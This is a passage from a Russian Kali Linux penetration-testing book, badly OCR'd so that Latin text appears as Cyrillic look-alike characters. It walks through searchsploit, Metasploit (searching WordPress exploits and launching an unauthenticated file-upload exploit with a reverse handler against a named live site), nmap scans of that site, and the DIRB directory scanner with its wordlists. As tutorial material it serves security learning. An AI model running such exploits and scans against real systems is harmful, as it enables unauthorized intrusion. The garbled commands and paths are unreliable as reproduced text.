Файл Правка Вид Поиск Терминал Справка 


:~# рНр /изг/зІпаге/ехр1оі1:сІЬ/рІа'І:Тогт5/рІтр/\л/еЬарр5/35413 .ррр ѵіеЬѵіа 
ге.Ьіг АІехеу 50 

СѴЕ-2Ѳ14-9Ѳ34 | Ѵі/огсІРгезз <= ѵ4.Ѳ Оепіаі оТ Зегѵісе ѴиІпегаЬіІіТу 
РгооТ-оТ-СопсерТ сіеѵеіоресі Ьу ]обпсазесигеіі .сот (ИТТр://зесиге1і .сот) 

изаде: рбр могфгеззесі.рітр сіотаіп .сот изегпате питЬегОТТЬгеасІз 
е.д.: ррр могсіргеззесі.рИр ѵіо гсіргезз.огд асітіп 50 

Зепсііпд Р05Т сІаТа (изегпате: АІехеу; ТИгеасІз: 50) То меЬмаге .ЫтЩ 


О 


Файлы .рі написаны на языке РегІ, перед именем файла, для запуска, нужно ставить 
регі. Аргументы передаются в командной строке (или вписываются в исходный код) как 
и с РНР. 


Думаю, с поиском всё предельно просто. С конкретным применением — зависит от 
конкретного эксплойта. Переходим к МеТазрІоіІ:. 

Меіазріоіі 

Программа МеТазрІоіІ: расположена в меню в двух местах. Самый быстрый способ — 
это найти её среди 10 самых популярных приложений. Там она называется МеТазрІоіІ: 
Ргатеѵѵогк. Запуск каждый раз занимает какое-то время, поэтому просто ждём: 


По материалам сайта ѴѴеЬѴѴаге.Ьіі 


260 













Тестирование на проникновение с помощью Каіі Ыпих 2.0 


Терминал 

Файл Правка Вид Поиск Терминал Справка 


Зіагііпд ТМе Меіазріоіі: Ргатемогк сопзоІе...\ 


- о 


I X 


МЕТА5РЮІТ СѴВЕК МІ55ИЕ СОНМАМ V4 


#### _ _ _ ####### _ _ _ #### 

#### / \ / \ / \ ########### / \ / \. / \ #### 
################################################################################ 
################################################################################ 
# МАѴЕ 4 ######## 5С0КЕ 31337 ################################## НІСН ЕРЕРРРРР # 
################################################################################ 

ЫТр ://шеТазр!оіТ .рго 

І_оѵе Іеѵегадіпд с гесіепігіаіз? СНеск оиТ ЬгиТеТогсіпд 
іп Меіазріоіі: Рго -- Іеагп тоге оп М:1:р ://гарісІ7 .сот/теСазрТоИ: 

=[ теТазрТоіІ ѵ4.11.0-2014122301 [соге :4.11.0.рге.2014122301 арі:1.0.0]] 

+ -- --=[ 1388 ѳхріоііз - 866 аихіііагу - 236 роз! ] 

+ -- --=[ 342 рауіоасіз - 37 епсосіегз - 8 порз ] 

+ -- --=[ Ргее МеТазрІоіІ: Рго Ігіаі: ЫТр ://г-7.со/1 гутзр ] 


тзЕ > | 


Если программа пишет вам что-то про базу данных и про медленный поиск, то 
воспользуйтесь этой инструкцией . А также можете вручную пересобрать кэш: 


1 


т5І>сіЬ геЬиіІсІ сасііе 


Для поиска наберите зеагсН + пробел + ключевые слова. Например: 


1 


тзі > зеагсіі ѵѵогфгезз 
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тзі > зеагсН ѵлэгфгезз 
МаісЬіпд Мосіиіез 


Маше 

аихіііа гу/асІтіп/Іііір/ѵф_си5іот_сопіасі_іо гтз 

аихіііа гу/сІоз/Ыір/ѵго гф гезз_хш1 грс_сІ05 

аихіііа гу/даіНе г/цэ_иіЗ_іоі а!_с ас Ье_Ьа5Іі_ехі гасі 

аихіііа гу/рго/\*/еЬзсап/ріір_\«югф гѳ55_1азіро5і 

аихіі іа гу/зсаппе г/Мір/ѵга гсір гезз_1 одіп_епит 

аихіііа гу/зсаппе г/Ьіір/ѵчо гсір гезз_ріпдЬаск_ассезз 

аихіііа гу/зсаппе г/Ыір/\*го гф гезз_зсаппе г 

аихіііагу/зсаппе г/ІііІр/ѵл> гсір гезз_хт1 грс_1одіп 

аихіііа гу/зсаппе г/касіетііа/зе гѵе г_іпТо 

аихіііа гу/зсаппе г/ззіі/сіеіес і_кірро 

ехр1оіі/ипіх/\лгеЬарр/іоот1а_акееЬа_ипзегіа1і2е 

ехр1оіі/ипіхЛгеЬарр/рЬр_ѵѵогфгѳ55_іохурге55 

ехрі оіі /ипіхЛ\гѳЬарр/рф_ѵ\га гсір гезз_іп іизіопзоіі 

ехр1оіі/ипіх/ѵ>іеЬарр/ріір_ѵ/о гфгезз_1азіро5і 

ехр1оіі/ипіх/ѵ\іеЬарр/рф_ѵіго гсір гезз_оріітІ 2 ѳр гезз 

ехр1оіі/ипіх/меЬарр/рЬр_ѵ\гогфге55_іоіа1_сасРіе 

ехр1оіі/ипіх/меЬарр/рф_хт1грс_еѵа1 

ехр1оіі/ипіх/ѵ\геЬарр/\лір_ас1ѵапсесІ_сизіоііі_ііе1с1з_ехес 

ехр1оіі/ипіх/ѵ\»еЬаррЛф_а55еі_тападег_ир1оасІ_ехес 

ехр1оіі/ипіх/ѵ\геЬарр/мр_сіоѵі/п1оасІтападег_ир1оасі 

ехр1оіі/ипіх/мѳЬарр/<л<р_доод1е_сІоситепі_етЬѳсІсІег_ехес 

ехр1оіі/ипіх/ѵ»іеЬаррЛ/р_р горегіу_ир!оасІ_ехес 

ехр1оіі/ипіх/ѵхеЬарр/ѵф_мріоисН_Ті1е_ир1оасІ 

ехр1оіі/ипіх/\л»еЬаррЛіір_ѵ«/у5ііа_пеѵі/5ІѳіІег5_ир1оасі 

ехр1оіі/\»ііпсіоѵі/5/Ьго\л/5ег/асІоЬе_і1а5ф1ауег_пеміипсііоп 

ехр1оіі/ѵчіпсІоѵі/з/іі1еіогтаі/асІоЬе_і1а5ф1ауег_Ьиііоп 

ѳхр1оіі/ѵѵіпсІоѵ»і5/іі1еіогтаі/асІоЬе_і1а5ф1ауег_пеѵіііипсііоп 

ехрі оіі/«іпсіомз/Тіі еТо гтаі/шз 12_0Ѳ5 

ехр1оіі/міпс1оѵі<5/іі1еіогтаі/міпгаг_пате_5рооііпд 

ехр1оіі/\ѵіпЬоѵі/5/іІр/еазуіір_с\»/сІ_ііхгеі 

ехрІоіі/ѵкіпФѵчз/Іііір/зѵі/З-СоппесііоП-Ьоі 

розі /міпЬоѵігз/даіііе г/с гесіепі іаі з/ гаге г_зу парзе 


Оізсіозиге Оаіе Капк 


Резсгірііоп 


2014-08-07 погтаі МогсІРгезз сизіот-сопіасі-іогтз Ріидіп 501. ІфІоаЬ 

2014-08-06 погтаі Ѵі/огфгезз ХМІ.ВРС Ро5 

погтаі МЗ-ТоіаІ-Сасііе Іл/о гсір гезз-ріидіп 0.9. 2.4 (ог Ьеіоге) ІІзегпате апсі НазЬ Ехігасі 

погтаі РВО: Могфгезз ( < ѵі.5.1.3) сіѳіесііоп тосіиіе 

погтаі Ѵі/огсІР гезз Вгиіе Рогсе апсі ІІзег Епитѳгаііоп ІЛІІІТу 

погтаі Могфгѳзз РіпдЬаск І_осаіог 

погтаі Ѵі/о гсір гезз 5с аппе г 

погтаі Мо гсір гезз ХМІ.-ВРС ІІзетате/Раззѵі/огсІ І-одіп 5саппе г 
погтаі баіііег Касіетііа 5егѵег Іпіогтаііоп 

погтаі Кірро 55Н Нопеуроі Рѳіесіог 

2014-09-29 ехсѳііепі Іоотіа АкееЬа Кіскзіагі Ііпзегіаііге Ветоіе Сосіе Ехесиііоп 

2012- 06-05 ехсеііепі Ѵі/огсІРгезз Ріидіп Рохургезз иріоагіііу .рф АгЬіігагу Сосіе Ехесиііоп 

2014-09-25 ехсеііепі Ѵі/огфгезз Іпіизіоп5оіі Цріоасі ѴиІпегаЬіІііу 

2005-08-09 ехсеііепі Ѵі/огсІРгезз сасііе_ІазірозісІаіе АгЬіігагу Сосіе Ехесиііоп 

2013- 11-29 погтаі МогсІРгеэз ОріітігеРгезз ТЬете Рііе ІІрІоаЬ ѴиІпегаЬіІііу 

2013- 04-17 ехсеііепі Могфгезз М3 Тоіаі СасЬе РНР Сосіе Ехесиііоп 

2005-06-29 ехсеііепі РНР ХМЬ-ВРС АгЬіігагу Сосіе Ехесиііоп 

2012-11-14 ехсеііепі МогсіРгезз Ріидіп АсІѵапсесІ Сизіот Ріеісіз Ветоіе Рііе Іпсіизіоп 

2012- 05-26 ехсеііепі Ѵі/огсІРгезз Аззеі -Мападег РНР Рііе Іфіоасі ѴиІпегаЬіІііу 

2014- 12-03 ехсеііепі Могфгезз Роѵкпіоасі Мападег (сіомпіоасі-тападег) ІІпаиіНепіісаіесІ Рііе ІІрІоасІ 

2013- 01-03 погтаі МогРРгезз Ріидіп Соодіе Роситѳпі ЕтЬесІсІег АгЬіігагу Рііе Оізсіозиге 

2012-03-26 ехсеііепі Ѵі/огсІРгезз МР-Ргорегіу РНР Рііе фіоасі ѴиІпегаЬіІііу 

2014- 07-14 ехсеііепі Могфгезз МРТоисЬ АиіЬепіісаіеЬ Рііе фіоар 

2014-07-01 ехсеііепі Могфгезз МаіІРоеі Меѵ/зіеііегз (музі]а-пеѵ/з1еііег5) ІІпаиіЬепіісаіесІ Рііе ІІрІоасІ 

2010-06-04 погтаі АсІоЬе РІазЬ Ріауег "пеѵігРипсііоп" Іпѵаіісі Роіпіег 1)зе 

2010-10-28 погтаі АсІоЬе РІазН Ріауег "Виііоп" Ветоіе Сосіе Ехесиііоп 

2010-06-04 погтаі АсІоЬе РІазН Ріауег "пеѵі/Рипсііоп" Іпѵаіісі Роіпіег ІІзе 

2012-01-10 ехсеііепі М512-0Ѳ5 МісгозоРі ОРРісе СІіскОпсе ІІпзаРе 0Ь}есі Раскадѳ НапЫіпд ѴиІпегаЬіІііу 

2009- 09-28 ехсеііепі МіпВАВ Рііепате 5рооРіпд 

2010- 02-16 дгеаі ЕазуРТР 5егѵег СѴЯ) Соттапсі 5іаск Виііег ОѵегРІоѵѵ 

2012-07-20 погтаі 5ітр1е МеЬ 5егѵег Соппѳсііоп Неасіег Виііег ОѵегРІоѵ/ 

погтаі Міпсіоѵі/з баіЬег Вагег 5упарзе Раззѵ/огсІ Ехігасііоп 


Расширьте окно терминала, как это сделал я, иначе ничего непонятно. 

В выводе должно быть всё понятно: первый столбец — расположение эксплойта, 
второй — дата, третий — ранг (насколько хороший среднестатистический результат), 
четвёртый — краткое описание. 

Думаю, хакеры не любят ѴѴогсІРгезз за его автообновления, т. к. все известные 
уязвимости протухают в первый же день. 


Я выбрал, например, этот: 


1 


ехрІоіі/ипіх/ѵѵеЬарр/\л/р_сІо\л/пІоасІтапа§ег_ирІоасІ 2014-12-03 ехсеііепі ѴѴогсІРгезз 
РоѵѵпІоасІ Мапа§ег (сІо\л/пІоасІ-тапа§ег) ІІпаиіИепіісаіесІ Рііе ІІрІоасІ 


Нужно скопировать его расположение — 
ехрІоіі/ипіх/\л/еЬарр/ѵѵр_сІо\л/пІоасІтапа§ег_ирІоасІ 


И теперь набираем команду изе и после пробела расположение эксплойта: 


тзР > и$е ехр!оіі/ипіх/ѵѵеЬарр/ѵѵр_сІо\л/пІоасІтапа§ег_ирІоасІ 


Обратите внимание, что строка приветствия сменилась на: 


тз Т ехр1оі1:( 


Теперь набираем: 


5І10ѴѴ орііопз 


(работает для всех эксплойтов — отображает варианты настойки) 
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Терминал 

Файл Правка Вид Поиск Терминал Справка 


тзі ехріоіі (мрсіоыпіоасітападегиріоас]) > зігом орііопз 
МосІиТе орііопз (ехрІоіі/ипіх/ѵ>/еЬарр/\л/р_сІоѵ\/пІоасІтападег_ирІоасІ) : 
Иате Сиггепі Зеіііпд КедиігесІ Эезсгірііоп 


Ргохіез 

ВН05Т 

ВРОВТ 80 

ТАК0ЕТ1Ш / 
ѴН05Т 


Ехріоіі іагдѳі: 

ІсІ Мате 

0 сіомпіоасі-тападег < 2.7.5 


тзі ехріоіі (мр сіомпіоасітападег иріоасі) > | 


ПО 

ІІзе а ргоху сГіаіп 


УѲ5 

ТЬе іагдеі асісігезз 


УѲ5 

ТГіе іагдеі рогі 


уез 

ТГіе базе раііі іо іііе 

ѵѵогфгезз арріісаііоп 

по 

НТТР зѳгѵѳг ѵігіиаі 

іюзі 


Как минимум, нам нужно задать удалённый хост. Все настройки делаются через 
команду $еі 


Например: 


1 


зеі КН05Т чл/еЬѵѵаге.Ьіг 


шзГ ехр!оіі( 1 іпІоа(!іг;л!і.ніег_ чріі ) > зеі ВН05Т ѵіеЪыа ге. Ыг 
ВНОБТ => меЬма ге.Ьіг 

тзі ехріоіі:( Іоипіоасішападег иріоа ) > | 


В данном эксплойте можно больше ничего не менять. Но обратите внимание на 
ТАКСЕТІІКІ. В отдельных эксплоитах, например, для рГірМуАсІтіп, этот параметр 
изначально задан как рГіртуасІтіп и если целевой скрипт находится в другом каталоге, 
то эксплойт просто не найдёт адрес. 


Для начала выполнения эксплойта наберите: 


1 


ехріоіі: 


тз'Г ехріоіі: ( іпадеі_іі[ 1 ) > ехріоіі: 

[*] БіагіесІ геѵегзе ЬапсІІег оп 127.0.0.1:4444 
[*] ыеЬ\л/аге.Ьіг:80 - Ііріоасііпд рауіоасі 

Ехріоіі іаііесі: меЬмаге .ЬІ 2 :8Ѳ - Еггог оп иріоасііпд іііе 
тзі ехріоіі( ) > | 


Думаю, общие принципы работы понятны. 
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Порекомендую ещё одну команду, чтобы было понятно, в какую сторону нужно копать, 
для чего искать эксплойты, какие порты открыты и для каких служб и т. д. Это команда 
птар. Применять так: 


1 


тзі > птар 10.0.2.2 


Файл Правка Вид Поиск Терминал Справка 


т5~Г > птар 10.0 

.2.2 


[*] ѳхес : 

птар 

10.0.2.2 


ЗІагГіпд ІМтар 6 

.47 ( М:1:р://птар.огд 

) аі 2015-01-09 17:40 М5К 

ІМтар зсап 

герогі Гог 10.0.2.2 


Нозі: із ир (0.00355 ІаГепсу) . 


N01: зНомп 

: 983 

Гіііегесі рогіз 


РОЯТ 

5ТАТЕ 

ЗЕЯѴІСЕ 


8Ѳ/Гср 

орѳп 

Ыір 


135/іср 

ореп 

тзгрс 


445/Гср 

орѳп 

тіс гозоГГ -сіз 


554/Гср 

орѳп 

гізр 


1688/іср 

орѳп 

пзіГр-сІаГа 


2869/іср 

орѳп 

ісзіар 


ЗЗѲб/іср 

орѳп 

тузді 


5357/іср 

орѳп 

мзсіарі 


10243/Іср 

орѳп 

ипкпомп 


49152/Іср 

орѳп 

ипкпомп 


49153/іср 

орѳп 

ипкпомп 


49154/1ср 

орѳп 

ипкпомп 


49155/іср 

орѳп 

ипкпомп 


49159/Гср 

орѳп 

ипкпомп 


49160/Іср 

орѳп 

ипкпомп 


49165/1ср 

орѳп 

ипкпомп 


БѲѲѲЗ/Тср 

орѳп 

ипкпомп 


МАС Асісігезз: 52 

:54:00:12:35:02 (ОЕМІІ 

Ѵігіиаі ЫІС) 

ІМшар сіопе 

: 1 ІР 

асісігезз (1 Поз! ир) : 

зсаппесі іп 7.35 зесопсіз 

тз'Г > | | 





і 


тзі > птар ѵѵеЬѵѵаге.Ьіі 



Файл Правка Вид Поиск Терминал Справка 


тзТ > птар \л/ѳЬ\л/агѳ.Ьіг 

[*] ѳхес: птар 

ѵі/еЬма ге. ЬІ 2 


ЗГагііпд Мшар 6.47 ( ЫГр ://птар .огд ) аі 2015-01-09 
Итар зсап герогГ Гог меЬмаге.Ьіг (185.26.122.50) 

Но5і із ир (0.062з Іаіепсу) . 

гй№ гесогсі Гог 185.26.122.50: зегѵ50-26 .Нозііапсі . ги 

17:43 М5К 

N01 зИомп : 988 

ГГІЛегесІ рогіз 


РОКТ 5ТАТЕ 

5ЕКѴІСЕ 


21/іср ореп 

Пр 


25/іср ореп 

зтГр 


80/іср ореп 

Ыір 


111/Гср ореп 

грсЬіпсІ 


443/Гср ореп 

ГіГірз 


873/іср ореп 

гзупс 


1022/Гср ореп 

ехр2 


1024/Гср ореп 

ксіт 


2049/іср ореп 

П'Гз 


3306/іср ореп 

тузді 


4443/іср ореп 

рЬагоз 


8080/Іср ореп 

ИГір-ргоху 


Мшар сіопе: 1 ІР асісігезз (1 Иозі ир) зсаппесі іп 39.51 

зесопсіз 

тзТ > | 
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Ну и, конечно, для того чтобы знать, какие эксплойты использовать, нужно знать 
работающие на целевой машине программы и их версии. Определённую помощь в 
этом может оказать вам статья " Обзор разделов инструментов Каіі Ыпих 1.0.9а. Часть 2. 
Инструменты для сбора информации ". 

Заключительные слова 

Скажу честно, базы эксплойтов меня разочаровали: я слежу за обновлениями самых 
популярных веб-приложений (рГірМуАбтіп, ѴѴогсІРгезз, ОгираІ и т. д.) и за последние 
месяцы в списках изменений мелькало достаточно много закрытых уязвимостей. Под 
большинство из них я не нашёл эксплойтов. Возможно, это касается только эксплойтов 
для веб-приложений. Вполне возможно, что для операционных систем и программ всё 
намного интереснее. Отсутствие в паблике эксплойтов на свежие версии популярных 
веб-приложений я связываю с тем, что: а) не так уж и просто потенциальную 
уязвимость раскрутить, хотя бы, до работающего концепта; б) самые интересные 
эксплойты собраны в закрытых базах, возможно, доступных за плату или только для 
определённого круга лиц. 


Глава 43. РІКВ: поиск скрытых каталогов и файлов на веб-сайтах 

Статья написана по материалам Энциклопедии КаІі.ТооІз 

Никогда не бывает лишним просканировать веб-сайт на наличие скрытых каталогов и 
файлов (скрытых — имеются ввиду каталоги и файлы, на которые не ведут ссылки, и о 
которых знает только веб-мастер). Как минимум, можно узнать что-то новое о сайте, а 
бывает просто выпадает супер-приз — архив сайта или базы данных, бэкап 
чувствительных файлов и т.д. 

РІ КВ — это сканер веб-контента. Он ищет существующие (возможно, скрытые) веб¬ 
объекты. В основе его работы лежит поиск по словарю, он формирует запросы к веб¬ 
серверу и анализирует ответ. 

РІ КВ поставляется с набором настроенных на атаку словарей для простого 
использования, но вы можете использовать и ваш собственный список слов. Также 
иногда РІ КВ можно использовать как классический ССІ сканер, но помните, что в 
первую очередь это сканер содержимого, а не сканер уязвимостей. 

Главная цель РІ КВ — это помочь профессионалам в аудите веб-приложений. Особенно 
в тестах ориентированных на безопасность. Она покрывает некоторые дыры, не 
охваченные классическими сканерами веб-уязвимостей. РІ КВ ищет специфические веб¬ 
объекты, которые другие сканеры СОІ не ищут. Она не ищет уязвимости и не ищет веб¬ 
содержимое, которое может быть уязвимым. 

Может быть, эта программа станет последней попыткой для невезучих аналитиков по 
безопасности... 


Использование йІКВ 


і 


сіігЬ <базовый_адрес> [<список(и)_файлов>] [опции] 
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Примечания 

<базовый_адрес> : Основной ІІРЯ для сканирования. (Используйте -гезите для 
возобновления сессии) 

<список(и)_файлов> : Список словарей. (словарь1,словарь2,словарьЗ...) 

Горячие клавиши ОІКВ 

'п' -> Перейти к следующей директории. 

'я' -> Остановить сканирование. (Сохронить состояние для возобновления) 

V -> Кетаіпіп§ зсап зТаТз. 

Опции йІВВ 

-а <строка_агента> : Задайте ваш пользовательский ІІ5ЕК_А0ЕІ\ІТ. 

-с <строка_кукиз> : Установите куки для НТТР запроса. 

-1 : Забавный тюнинг при выявлении І\ІОТ_РОІІІ\Ю (404). 

-И <строка_заголовка> : Задайте пользовательский заголовок НТТР запроса. 

-і : Использовать поиск без учёта регистра. 

-I : Печатать заголовок "І_оса1:іоп" когда найден. 

-И <пТ_сосіе>: Игнорировать ответы с этим НТТР кодом. 

-о <файл_для_вывода> : Сохранить вывод на диск. 

-р <прокси[:порт]> : Использовать прокси. (Порт по умолчанию 1080) 

-Р <ргоху_изетате:ргоху_раз5\л/огсІ> : Аутентификация на прокси. 

-г: Не искать рекурсивно. 

-К : Интерактивная рекурсия. (Спрашивать для каждой директории) 

-5 : Молчаливый режим. Не показывать тестируемые слова. (Для простых терминалов) 

-I: Не принуждать к конечному слешу '/' в II КС 
-и <пользователь:пароль> : НТТР аутентификация. 

-ѵ : Показывать также страницы І\ЮТ_РОІІІ\Ю. 

-ѵѵ : Не показывать сообщений \Л/АКІ\ІІІ\ІС. 

-X <расширение> / -х <расширения_файла> : Применить эти расширения к каждому 
слову. 

-г <миллисекунды> : Добавить миллисекунды,для задержки, чтобы не стать причиной 
экстенсивного флуда. 

Примеры йІКВ 

сіігЬ ННр://игІ/сІігес1:огу/ (Простой тест) 

сіігЬ Ы:1:р://игІ/ -X .НітІ (Тестировать файлы с расширением ЧіІтГ) 

сіігЬ Ьир://игІ/ /изг/збаге/сІігЬ/ѵѵогсІІізІіз/ѵиІпз/арасНе.Ш (Тестировать списком слов 
арасбе.Ш) 

сіігЬ Ні;1;р5://5есиге_игІ/ (Простой тест с 55Ь) 
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Дерево словарей ОІКВ 


1| 

гоо1;(а)\Л/еЬ\А/аге:~# Ігее /изг/зЬаге/ѵѵогсіІ ібТз/сіігЬ* 

21 

/изг/зІіаге/ѵѵогсІІІзІБ/сІігЬ 

3| 

| — Ыд.М 

4| 

| — саіаіа.іхі; 

51 

| — соттоп.іхі; 

6| 

| — еизкегаТх! 

71 

| — ех1еп5Іоп5_соттоп.1;х1; 

81 

| — іпсіехез.іхі: 

91 

| — ти1а1іоп5_соттоп.1:х1: 

10 


| — оіИегз 

11 


| | — Ье$И050.1:х1: 

12 


| | — ЬезШО.вЛ 

13 


| | — Ье5І:15.1х1: 

14 


1 — патез.М 

15 


| — зтаМ .ТхТ 

16 


| — зрапізЬ.ІхІ: 

17 


| -5ІГѲ55 

18 


| — аІрЬапит_са5е_ех1:га.1:х1: 

19 


| — аІрЬапит_са5е.1:х1: 

20 


| — сНаг.М 

21 


| — сІоЫе_и гі_Иех.Тх1: 

22 


| | — Іе5І:_ех1:.1:х1: 

23 


| — ипісосіе.іхі: 

24 


1 — игі_Ьех.1:х1: 

25 


1 —ѵиіпз 

26 


| — арасНе.М 

27 


| — ахіз.ТхІ: 

28 


| — с§і 5.1x1: 

29 


| — соІсІТизіоп.ТхІ: 

30 


| — сіоті по.ТхТ 

31 


| — ^а1лл/іге_ра§епате$.1:х1: 

32 


| —ТаТѵѵі ге.ТхТ 

33 


| —Ігопіраёе.іхі: 

34 


| — НрзтН.М 
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35 


|— Иурегіоп.ТхІ; 

36 


|- ІІ5.ІХІ 

37 


|— іріапеі.іхі 

38 


|— іЬозз.Іх! 

39 


| —іегзеу.іхі 

40 


| —ігип.іхі 

41 


| — пеіѵѵаге.іхі 

42 


| — огасіе.іхі 

43 


| — гог.1x1: 

44 


| — зар.ТхТ 

45 


| — зНагероіпІ.Іх! 

46 


| — зипаз.іхі 

47 


| — ТезТз.ТхТ 

48 


| — ТотсаТ.ТхТ 

49 


|— ѵі§пе11е.1х! 

50 


|— \л/еЫо§іс.1х1 

51 


1 —ѵѵеЬзрЬеге.ТхІ; 

52 


/изг/зІіаге/ѵѵогсІІІзІз/сІігЬизІег 

53 


| — арасііе-изег-епит-і. 0.1x1; 

54 


| — арасІіе-и5ег-епит-2.0.1x1 

55 


| — сПгесТогіез.іЬгоТигг 

56 


| — сіігесіогу-іізі-і.0.1x1 

57 


| — сі ігес1;огу-ІІ5І;-2.3-тесІіит .ТхТ 

58 


| — сіігес1огу-ІІ5І-2.3-5таІІ.1х1 

59 


| — гіігес1огу4і5і4оѵѵегса5е-2.3-тесііит.1х1 

60 


1 — сІігес1огу-Іі5І-Іо\/ѵегса5е-2.3-5таІІ.1х1 

61 



62 


3 сіігесіогіез, 54 ІІІез 


Описание словарей ОІГСВ 


Название файла 

Полный путь до файла 

Количеств 

о записей 
в файле 

Описание 

содержимог 

о 

Ьі§.1х1 

/и 5 г/з Іі а ге/\л/о гсі 1 і зіз/сі і г Ь/Ь і §. 1x1 

20469 


саіаіа.іхі 

/ изг/зііа ге/\л/о гсі 1 ібіз/сіі гЬ/ саіа Іа .1x1 

161 


соттоп.іхі 

/изг/зІіаге/ѵѵогсІІізІз/сІігЬ/соттоп.ІхІ 

4614 
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Название файла 

Полный путь до файла 

Количеств 

о записей 
в файле 

Описание 

содержимог 

о 

еизкега.іхі: 

/изг/зЬаге/ѵѵогсІІізІБ/сІігЬ/еизкега.ІхІ: 

197 


ех1еп5Іоп5_соттоп.1: 

хі 

/и5г/5Ьаге/ѵѵогсІІі5І:5/сІігЬ/ех1:еп5іоп5_соттоп.Іх1: 

29 

Расширения 

файлов 

іпсіехез.іхі 

/изг/зЬаге/ѵѵогсІІізІз/сІігЬ/іпсІехез.ІхІ: 

10 


ти1;а1;іоп5_соттоп.1; 

хі 

/и5г/5Ьаге/ѵѵогсІІі5І5/сІігЬ/тиІаІіоп5_соттоп.1:х1: 

49 


ЬезИОБО.ЪЛ 

/изг/зІіаге/ѵѵогсІІізІз/сІігЬ/оіЬегз/ЬезІІОБО.ІхІ: 

1049 

Лучшая 
выборка из 
1050 пунктов 

ЬезШО.М 

/изг/зНаге/ѵѵогсІІізІз/сІігЬ/оіЬегз/ЬезІІІО.ІхІ: 

110 

Лучшая 
выборка из 
110 пунктов 

ЬезІІБ.ЪЛ 

/изг/зЬаге/ѵѵогсІІізІз/сІігЬ/оіЬегз/ЬезІІБ.ІхІ: 

15 

Лучшая 
выборка из 
15 пунктов 

патез.М 

/изг/зЬаге/ѵѵогсІІізІз/сІігЬ/оІІіегз/патез.ІхІ: 

8607 


зтаІІ.М 

/изг/зНаге/ѵѵогсІІіБІз/сІігЬ/зтаІ 1.1x1 

959 


зрапізіі.іхі 

/и 5 г/5 Іі а ге/ѵѵо гсі 1 і зіз/сі і г Ь/з ра п і 5 6. іхі 

449 

Испанские 

слова в 

каталогах 

аІрНапит_са5е_ехІга. 

1x1 

/и5г/5Наге/ѵѵогсІІі5І5/сІігЬ/5Іге55/аІрЬапит_са5е_ех 
1га.М 

95 


аІрЬапит_са5е.Іх1: 

/изг/зКіа ге/ѵѵо гсі 1 ізіз/сіі г Ь/з^гезз/а 1 р Ьа пи т_са5е .1:х1: 

62 


сИаг.ТхТ 

/изг/зЬаге/ѵѵогсІІізІз/сІігЬ/зІгезз/сЬаг.ІхІ: 

26 


сІоЫе_игі_Ьех.1:хІ 

/изг/зЬаге/ѵѵогсІІізІз/сІігЬ/зІхезз/сІоЬІе-игНіех.ІхІ: 

256 


Іе5І_ехІ.Іх1: 

/изг/зЬаге/ѵѵогсІІізІз/сІігЬ/зІгеззДезІ-ехІ.ІхІ: 

17576 


ипісосіе.іхі: 

/изг/зЬаге/ѵѵогсІІізІз/сІігЬ/зІгезз/ипісосІе.ІхІ: 

65536 


игі_Ьех.1;х1; 

/изг/зІіаге/ѵѵоггіІізІз/сІігЬ/зІтезз/игПіех.ІхІ: 

256 


арасНе.М 

/изг/збаге/ѵѵоггіІізІз/сІігЬ/ѵиІпз/арасбе.ІхІ: 

30 

Арасбе 

ахіз.іхі: 

/иэ г/зНа ге/ѵѵо гсі 1 ізіз/сі і гЬ/ѵи 1 пз/ахіг .1x1: 

17 


С§І5.(ХІ 

/изг/зІіаге/ѵѵогсІІізІз/сІігЬ/ѵиІпз/сбіз.ІхІ: 

3494 


соІсШізіоп.ІхІ: 

/изг/зНаге/ѵѵогсіІізТз/сІігЬ/ѵиІпз/соІсІТиБІоп.ІіхІ; 

21 


сіотіпо.іхі: 

/ изг/зЬа ге/ѵѵо гсі 1 ізіз/сіі г Ь/ѵи 1 пз/сіот і по .1:х1: 

291 


^а1;\л/іге_ра§епате5.1;х 

1; 

/изг/зНаге/ѵѵогсІІізІіБ/сІігЬ/ѵиІ пз/Та1;\л/іге_ра§епате5 

.1x1 

2711 


ТаТѵѵі ге.М 

/изг/зЬаге/ѵѵогсНіБІіз/сІ ігЬ/ѵиІпз/^а1;\л/іге.1;х1; 

101 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


Название файла 

Полный путь до файла 

Количеств 

о записей 
в файле 

Описание 

содержимог 

о 

Тгоп1;ра§е.1;х1; 

/изг/зІіаге/ѵѵогсІІізІз/гіігЬ/ѵиІпз/ітопІіраёе.ІхІ: 

43 


НрзтЬ.М 

/изг/зИаге/ѵѵогсЛізТз/сНгЬ/ѵиІпз/НрзтЬ.ІіхІ; 

238 


Ьурегюп.ЪЛ 

/изг/зЬаге/ѵѵогсІІізІз/сІігЬ/ѵиІпз/Ііурегіоп.ІхІ: 

579 


ІІ5.ІХІ 

/изг/зИаге/ѵѵогсЛізТз/сНгЬ/ѵиІпз/ііз.ІіхІ; 

59 

N5 

іріапеі.іхі 

/изг/зііаге/ѵѵогсііізіз/сіігь/ѵиіпз/іріапеі.іхі: 

36 


ІЬоббТхі; 

/изг/зИаге/ѵѵогсІІізТз/сІігЬ/ѵиІпз/іЬозз.ІіхІ; 

19 


іегзеу.Ш 

/изг/зІіаге/ѵѵогсІІізІз/сІігЬ/ѵиІпз/іегзеу.ІхІ: 

129 


Ігип.іхі: 

/изг/зІіаге/ѵѵогсіІізІз/сІігЬ/ѵиІпз/ігип.ііхі 

13 


пеіѵѵаге.іхі 

/изг/зЬа ге/ѵѵо гсі 1 ізіз/сі і гЬ/ѵи 1 пз/ пеіѵѵа ге.іхі 

60 


огасіе.іхі: 

/ изг/зКіа ге/\л/о гсі 1 і зіз/сі і г Ь/ѵи 1 пз/огасі е.гхі: 

1075 

Огасіе 

гог.ТхТ 

/ изг/зЬа ге/ѵѵо гсі 1 ізіз/сіі г Ь/ѵи 1 пз/го г .1:х1: 

121 


зар.іхі 

/изг/зЬаге/ѵѵо гсНізІз/сМгЬ/ѵиІпз/зар.ІхІ: 

1111 


зЬагероіпІ.ІхІ: 

/изг/зЬаге/ѵѵогсІІізІз/сІігЬ/ѵиІпз/зІіагероіпІ.ІхІ: 

1708 


зипаз.М 

/изг/зЬаге/ѵѵогсЛ ізТз/сПгЬ/ѵиІпз/зипаз.ТхІ; 

52 


Іезіз.іхі 

/изг/зЬаге/ѵѵогсПізІз/сИгЬ/ѵиІпз/ІезІз.ІхІ: 

34 


Іотсаі.іхі 

/изг/зНаге/ѵѵогсІІІБТБ/сІігЬ/ѵиІ ПБ/ТотсаТ.ТхТ 

87 

Тотсаі 

ѵідпеПе.ІхІ: 

/изг/зІіаге/ѵѵогсІІізІз/сІігЬ/ѵиІпз/ѵідпейе.ІхІ: 

74 


ѵѵеЫодіс.ІхІ: 

